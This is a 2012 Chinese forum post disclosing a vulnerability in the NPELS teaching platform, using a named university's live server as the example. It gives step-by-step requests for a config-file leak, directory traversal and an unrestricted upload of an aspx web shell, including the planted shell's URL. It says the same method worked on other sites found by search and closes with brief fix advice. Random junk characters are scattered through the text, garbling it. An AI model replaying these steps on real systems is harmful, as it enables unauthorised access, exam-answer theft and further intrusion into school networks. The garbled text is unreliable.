找回密码
 立即注册
查看: 3142|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中, D9 j( J! H9 L

: A  u" t2 b+ ]$ q详细说明:0 v! G) |2 Y& [9 Z5 q
" T* o. o! ^  F! V! |$ K
以南开大学的为例: 1 b0 i! b8 t6 ]
http://222.30.60.3/NPELS
( t: g3 t- D8 V+ C7 t# p  BNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址& @& F; _" V' {1 Y$ T0 D, L  ^
<setting name="Update_CommonSvr_CommonService" serializeAs="String">( D4 `$ f; ?  F# A/ l: M; P+ z" }
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>: K: ?' i/ g0 a
</setting>7 ?' U3 X% q1 x) M0 Z2 U
及版本号
: Q" B$ b4 |; T3 j* j* a( h) E<add key="TVersion" value="1, 0, 0, 2187">: K  {7 a. H$ p7 g, z/ L
</add>/ C; k1 J8 U5 o  d, i( s" {
直接访问
% T! f# p# K* {, F: g/ ehttp://222.30.60.3/NPELS/CommonService.asmx
- w+ q- `4 `# Y! X" B使用GetTestClientFileList操作,直接 HTTP GET 列目录:
! |; }  i' H6 @% l: l" d; Whttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21871 r, s  I' v: o3 O- r
进一步列目录(返回的网页很大,可以直接 wget 下来)5 [: s  X9 |; B, n/ z( Q
http://222.30.60.3/NPELS/CommonS ... List?version=../../
% o; K1 p  J& Q' N( G8 L& S
$ }9 w8 e( y' `: _发现% ~: Z" `; ^/ d1 Z8 t
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm, @/ f/ c9 f3 y' K0 V4 d: V
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头. ^; e( x( e9 \
上传后继续列目录找到木马地址直接访问即可
% {, H( ?- B+ w3 p$ n2 N6 h% S % L( a0 H! @0 X# C' c* I8 z, A  z1 {9 Y1 W
OOXX: N- T3 T5 {" P1 m/ r
5 ]) Q$ d' @# t" _, ?8 c7 E0 m
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法/ w: J) L' ?' T, s
漏洞证明:) ]3 J+ s4 j, N* N0 k( P% y) S. e- R
2 u* C) X8 l% a! M
列目录:
$ ^& s0 v  @% zhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
# w0 n4 j% o1 {文件上传:
% V! O* A8 Z; ]+ S" z# ?http://222.30.60.3/npelsv/editor/editor.htm8 M) m" K3 `0 v0 d7 K. O$ m( G5 D
' I% V. |( L1 e+ C0 [1 U7 D
上传木马:
3 o- L- Z. q, A: G5 Z7 N3 J. dhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
0 }. |# t& x) R1 J! J% \
2 O/ I, d# m1 }4 v修复方案:
2 _; r- U# Z9 H' F3 }6 @好像考试系统必须使用 CommonService.asmx9 b" N- n7 ?3 M& f$ ?
最好配置文件加密或者用别的方式不让它泄露出来4 Z7 _& i+ Y- l0 p: Y; V0 P
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
9 b! |, V0 D+ _; Z5 |2 N( [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表